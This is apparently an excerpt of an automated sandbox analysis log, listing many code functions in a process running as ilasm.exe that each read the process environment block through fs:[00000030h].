Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3035C mov eax, dword ptr fs:[00000030h]	5_2_05C3035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3035C mov eax, dword ptr fs:[00000030h]	5_2_05C3035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAC310 mov ecx, dword ptr fs:[00000030h]	5_2_05BAC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD0310 mov ecx, dword ptr fs:[00000030h]	5_2_05BD0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEA30B mov eax, dword ptr fs:[00000030h]	5_2_05BEA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEA30B mov eax, dword ptr fs:[00000030h]	5_2_05BEA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEA30B mov eax, dword ptr fs:[00000030h]	5_2_05BEA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C5437C mov eax, dword ptr fs:[00000030h]	5_2_05C5437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC02A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC02A0 mov eax, dword ptr fs:[00000030h]	5_2_05BC02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE284 mov eax, dword ptr fs:[00000030h]	5_2_05BEE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE284 mov eax, dword ptr fs:[00000030h]	5_2_05BEE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C30283 mov eax, dword ptr fs:[00000030h]	5_2_05C30283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C30283 mov eax, dword ptr fs:[00000030h]	5_2_05C30283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C30283 mov eax, dword ptr fs:[00000030h]	5_2_05C30283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC02E1 mov eax, dword ptr fs:[00000030h]	5_2_05BC02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC02E1 mov eax, dword ptr fs:[00000030h]	5_2_05BC02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC02E1 mov eax, dword ptr fs:[00000030h]	5_2_05BC02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C462A0 mov eax, dword ptr fs:[00000030h]	5_2_05C462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C462A0 mov ecx, dword ptr fs:[00000030h]	5_2_05C462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C462A0 mov eax, dword ptr fs:[00000030h]	5_2_05C462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C462A0 mov eax, dword ptr fs:[00000030h]	5_2_05C462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C462A0 mov eax, dword ptr fs:[00000030h]	5_2_05C462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C462A0 mov eax, dword ptr fs:[00000030h]	5_2_05C462A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA2C3 mov eax, dword ptr fs:[00000030h]	5_2_05BBA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA2C3 mov eax, dword ptr fs:[00000030h]	5_2_05BBA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA2C3 mov eax, dword ptr fs:[00000030h]	5_2_05BBA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA2C3 mov eax, dword ptr fs:[00000030h]	5_2_05BBA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBA2C3 mov eax, dword ptr fs:[00000030h]	5_2_05BBA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C38243 mov eax, dword ptr fs:[00000030h]	5_2_05C38243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C38243 mov ecx, dword ptr fs:[00000030h]	5_2_05C38243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA823B mov eax, dword ptr fs:[00000030h]	5_2_05BA823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274 mov eax, dword ptr fs:[00000030h]	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA826B mov eax, dword ptr fs:[00000030h]	5_2_05BA826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB4260 mov eax, dword ptr fs:[00000030h]	5_2_05BB4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB4260 mov eax, dword ptr fs:[00000030h]	5_2_05BB4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB4260 mov eax, dword ptr fs:[00000030h]	5_2_05BB4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB6259 mov eax, dword ptr fs:[00000030h]	5_2_05BB6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAA250 mov eax, dword ptr fs:[00000030h]	5_2_05BAA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD8DBF mov eax, dword ptr fs:[00000030h]	5_2_05BD8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD8DBF mov eax, dword ptr fs:[00000030h]	5_2_05BD8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BECDB1 mov ecx, dword ptr fs:[00000030h]	5_2_05BECDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BECDB1 mov eax, dword ptr fs:[00000030h]	5_2_05BECDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BECDB1 mov eax, dword ptr fs:[00000030h]	5_2_05BECDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C34DD7 mov eax, dword ptr fs:[00000030h]	5_2_05C34DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C34DD7 mov eax, dword ptr fs:[00000030h]	5_2_05C34DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE6DA0 mov eax, dword ptr fs:[00000030h]	5_2_05BE6DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C50DF0 mov eax, dword ptr fs:[00000030h]	5_2_05C50DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C50DF0 mov eax, dword ptr fs:[00000030h]	5_2_05C50DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA6DF6 mov eax, dword ptr fs:[00000030h]	5_2_05BA6DF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDCDF0 mov eax, dword ptr fs:[00000030h]	5_2_05BDCDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDCDF0 mov ecx, dword ptr fs:[00000030h]	5_2_05BDCDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BACDEA mov eax, dword ptr fs:[00000030h]	5_2_05BACDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BACDEA mov eax, dword ptr fs:[00000030h]	5_2_05BACDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBADE0 mov eax, dword ptr fs:[00000030h]	5_2_05BBADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBADE0 mov eax, dword ptr fs:[00000030h]	5_2_05BBADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBADE0 mov eax, dword ptr fs:[00000030h]	5_2_05BBADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBADE0 mov eax, dword ptr fs:[00000030h]	5_2_05BBADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBADE0 mov eax, dword ptr fs:[00000030h]	5_2_05BBADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBADE0 mov eax, dword ptr fs:[00000030h]	5_2_05BBADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD0DE1 mov eax, dword ptr fs:[00000030h]	5_2_05BD0DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C84DAD mov eax, dword ptr fs:[00000030h]	5_2_05C84DAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C78DAE mov eax, dword ptr fs:[00000030h]	5_2_05C78DAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C78DAE mov eax, dword ptr fs:[00000030h]	5_2_05C78DAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDEDD3 mov eax, dword ptr fs:[00000030h]	5_2_05BDEDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDEDD3 mov eax, dword ptr fs:[00000030h]	5_2_05BDEDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE4D1D mov eax, dword ptr fs:[00000030h]	5_2_05BE4D1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA6D10 mov eax, dword ptr fs:[00000030h]	5_2_05BA6D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA6D10 mov eax, dword ptr fs:[00000030h]	5_2_05BA6D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA6D10 mov eax, dword ptr fs:[00000030h]	5_2_05BA6D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C48D6B mov eax, dword ptr fs:[00000030h]	5_2_05C48D6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCAD00 mov eax, dword ptr fs:[00000030h]	5_2_05BCAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCAD00 mov eax, dword ptr fs:[00000030h]	5_2_05BCAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCAD00 mov eax, dword ptr fs:[00000030h]	5_2_05BCAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C68D10 mov eax, dword ptr fs:[00000030h]	5_2_05C68D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C68D10 mov eax, dword ptr fs:[00000030h]	5_2_05C68D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB0D59 mov eax, dword ptr fs:[00000030h]	5_2_05BB0D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB0D59 mov eax, dword ptr fs:[00000030h]	5_2_05BB0D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB0D59 mov eax, dword ptr fs:[00000030h]	5_2_05BB0D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB8D59 mov eax, dword ptr fs:[00000030h]	5_2_05BB8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB8D59 mov eax, dword ptr fs:[00000030h]	5_2_05BB8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB8D59 mov eax, dword ptr fs:[00000030h]	5_2_05BB8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB8D59 mov eax, dword ptr fs:[00000030h]	5_2_05BB8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB8D59 mov eax, dword ptr fs:[00000030h]	5_2_05BB8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C38D20 mov eax, dword ptr fs:[00000030h]	5_2_05C38D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD8CB1 mov eax, dword ptr fs:[00000030h]	5_2_05BD8CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD8CB1 mov eax, dword ptr fs:[00000030h]	5_2_05BD8CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA8C8D mov eax, dword ptr fs:[00000030h]	5_2_05BA8C8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE2CF0 mov eax, dword ptr fs:[00000030h]	5_2_05BE2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE2CF0 mov eax, dword ptr fs:[00000030h]	5_2_05BE2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE2CF0 mov eax, dword ptr fs:[00000030h]	5_2_05BE2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE2CF0 mov eax, dword ptr fs:[00000030h]	5_2_05BE2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2CCA0 mov ecx, dword ptr fs:[00000030h]	5_2_05C2CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2CCA0 mov eax, dword ptr fs:[00000030h]	5_2_05C2CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2CCA0 mov eax, dword ptr fs:[00000030h]	5_2_05C2CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2CCA0 mov eax, dword ptr fs:[00000030h]	5_2_05C2CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BACCC8 mov eax, dword ptr fs:[00000030h]	5_2_05BACCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5 mov eax, dword ptr fs:[00000030h]	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAEC20 mov eax, dword ptr fs:[00000030h]	5_2_05BAEC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0C00 mov eax, dword ptr fs:[00000030h]	5_2_05BC0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0C00 mov eax, dword ptr fs:[00000030h]	5_2_05BC0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0C00 mov eax, dword ptr fs:[00000030h]	5_2_05BC0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0C00 mov eax, dword ptr fs:[00000030h]	5_2_05BC0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BECC00 mov eax, dword ptr fs:[00000030h]	5_2_05BECC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C34C0F mov eax, dword ptr fs:[00000030h]	5_2_05C34C0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C4CC20 mov eax, dword ptr fs:[00000030h]	5_2_05C4CC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C4CC20 mov eax, dword ptr fs:[00000030h]	5_2_05C4CC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE4C59 mov eax, dword ptr fs:[00000030h]	5_2_05BE4C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBAC50 mov eax, dword ptr fs:[00000030h]	5_2_05BBAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBAC50 mov eax, dword ptr fs:[00000030h]	5_2_05BBAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBAC50 mov eax, dword ptr fs:[00000030h]	5_2_05BBAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBAC50 mov eax, dword ptr fs:[00000030h]	5_2_05BBAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBAC50 mov eax, dword ptr fs:[00000030h]	5_2_05BBAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBAC50 mov eax, dword ptr fs:[00000030h]	5_2_05BBAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB6C50 mov eax, dword ptr fs:[00000030h]	5_2_05BB6C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB6C50 mov eax, dword ptr fs:[00000030h]	5_2_05BB6C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB6C50 mov eax, dword ptr fs:[00000030h]	5_2_05BB6C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE2F98 mov eax, dword ptr fs:[00000030h]	5_2_05BE2F98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE2F98 mov eax, dword ptr fs:[00000030h]	5_2_05BE2F98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C84FE7 mov eax, dword ptr fs:[00000030h]	5_2_05C84FE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C66FF7 mov eax, dword ptr fs:[00000030h]	5_2_05C66FF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BECF80 mov eax, dword ptr fs:[00000030h]	5_2_05BECF80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF0FF6 mov eax, dword ptr fs:[00000030h]	5_2_05BF0FF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF0FF6 mov eax, dword ptr fs:[00000030h]	5_2_05BF0FF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF0FF6 mov eax, dword ptr fs:[00000030h]	5_2_05BF0FF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF0FF6 mov eax, dword ptr fs:[00000030h]	5_2_05BF0FF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAEFD8 mov eax, dword ptr fs:[00000030h]	5_2_05BAEFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAEFD8 mov eax, dword ptr fs:[00000030h]	5_2_05BAEFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAEFD8 mov eax, dword ptr fs:[00000030h]	5_2_05BAEFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB2FC8 mov eax, dword ptr fs:[00000030h]	5_2_05BB2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB2FC8 mov eax, dword ptr fs:[00000030h]	5_2_05BB2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB2FC8 mov eax, dword ptr fs:[00000030h]	5_2_05BB2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB2FC8 mov eax, dword ptr fs:[00000030h]	5_2_05BB2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C34F40 mov eax, dword ptr fs:[00000030h]	5_2_05C34F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C34F40 mov eax, dword ptr fs:[00000030h]	5_2_05C34F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C34F40 mov eax, dword ptr fs:[00000030h]	5_2_05C34F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C34F40 mov eax, dword ptr fs:[00000030h]	5_2_05C34F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDEF28 mov eax, dword ptr fs:[00000030h]	5_2_05BDEF28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C50F50 mov eax, dword ptr fs:[00000030h]	5_2_05C50F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C84F68 mov eax, dword ptr fs:[00000030h]	5_2_05C84F68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BECF1F mov eax, dword ptr fs:[00000030h]	5_2_05BECF1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB2F12 mov eax, dword ptr fs:[00000030h]	5_2_05BB2F12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C66F00 mov eax, dword ptr fs:[00000030h]	5_2_05C66F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAF69 mov eax, dword ptr fs:[00000030h]	5_2_05BDAF69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDAF69 mov eax, dword ptr fs:[00000030h]	5_2_05BDAF69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BACF50 mov eax, dword ptr fs:[00000030h]	5_2_05BACF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BACF50 mov eax, dword ptr fs:[00000030h]	5_2_05BACF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BACF50 mov eax, dword ptr fs:[00000030h]	5_2_05BACF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BACF50 mov eax, dword ptr fs:[00000030h]	5_2_05BACF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BACF50 mov eax, dword ptr fs:[00000030h]	5_2_05BACF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BACF50 mov eax, dword ptr fs:[00000030h]	5_2_05BACF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BECF50 mov eax, dword ptr fs:[00000030h]	5_2_05BECF50
